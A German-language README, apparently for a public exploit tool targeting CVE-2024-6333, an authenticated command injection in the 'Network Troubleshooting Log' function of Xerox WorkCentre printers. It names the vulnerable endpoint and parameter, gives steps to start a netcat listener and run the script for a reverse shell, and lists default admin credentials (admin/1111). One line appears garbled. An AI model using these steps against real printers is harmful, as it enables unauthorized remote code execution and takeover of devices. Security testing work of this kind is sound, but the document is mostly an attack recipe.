
Schwachstelle für authentifizierte Remote-Code-Ausführung in Xerox-WorkCentre-Druckern über die Network-Troubleshooting-Log-Funktion.
Authentifizierte Remote-Codeausführung in Xerox-WorkCentre-Druckern über die Funktion „Network Troubleshooting Log".
Die Funktion „Network Troubleshooting Log" (/properties/security/network_troubleshooting_log.php) bereinigt den Zielserver-Parameter (security.nwtroubleshoot.destination.server) nicht ordnungsgemäß, wodurch ein authentifizierter Administrator beliebige Betriebssystembefehle einschleusen kann. Wenn die Netzwerkprotokoll-Erfassung gestartet wird, wird das injizierte Payload als Shell-Befehl ausgeführt, was zu Remote-Codeausführung führt.
073.110.019.14200)pip install -r requirements.txt
Starten Sie einen Listener auf Ihrem Rechner:
nc -lvnp 8443
Führen Sie den Exploit aus:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal.
| Argument | Erforderlich | Standard | Beschreibung |
|---|
--target | Ja | Ziel-URL (z. B. https://192.0.2.1) | |
--lhost | Ja | Listener-IP-Adresse | |
--lport | Nein | 8443 | Listener-Port |
--user | Nein | admin | Administrator-Benutzername |
--password | Nein | 1111 | Administrator-Passwort |
--proxy | Nein | Proxy-URL (z. B. http://127.0.0.1:8080) |